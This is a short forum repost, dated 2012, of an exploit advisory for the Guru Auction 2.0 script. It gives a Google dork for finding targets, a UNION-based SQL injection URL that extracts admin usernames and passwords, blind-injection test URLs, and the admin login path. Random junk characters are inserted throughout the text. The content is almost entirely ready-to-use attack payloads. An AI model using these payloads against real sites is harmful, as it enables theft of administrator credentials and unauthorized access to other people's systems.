Guru Auction 2.0 Multiple SQL Injection Vulnerabilities; X9 t0 b% A, c9 |! _( k4 Y
, u) y% g) X7 o2 \! p' T, a# q5 n; |+ t
作者 : v3n0m
. t. }7 E3 T4 U4 s1 B2 n应用 : Guru Auction 2.0
) p+ Y( g9 N4 U0 j6 ?- q# JPrice : $49
1 |) C: B# i! y2 k: `& jVendor : http://www.guruscript.com/% |. L- C4 V: Q: E& \: H
Google Dork : inurl:subcat.php?cate_id=; Z8 a+ \9 A% o, T u
1 D" [/ ?1 g7 cSQLi p0c:! U. b, x( {* a+ Z7 _" `
~~~~~~~~~~* I! Z6 {" H9 S/ O9 r
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--7 O7 M) Q1 e$ M# P0 A" t& h
?* s. ]6 i! D7 S& g. B6 Y6 X
, ]8 B+ J& E0 K7 Y盲注 p0c:
4 U/ j3 l( B% W, c( a1 h" o, j~~~~~~~~~~
3 ^+ s8 Z# |- Z1 Shttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
; v8 j: p H% b* {2 o. Y5 Z$ Vhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false' J# x2 } l8 I' m
( Z0 ]. Z, J/ c( u# |7 d: s
管理登录入口:
5 q" u2 y! G2 M0 p [$ f& I( Q~~~~~~~~~~) t# W& B9 B7 I# y0 y5 r: R
http://domain.tld/[path]/admin/3 [! C6 f( X& l9 E
|
发表于 2012-12-31 09:24:05
收藏
支持
反对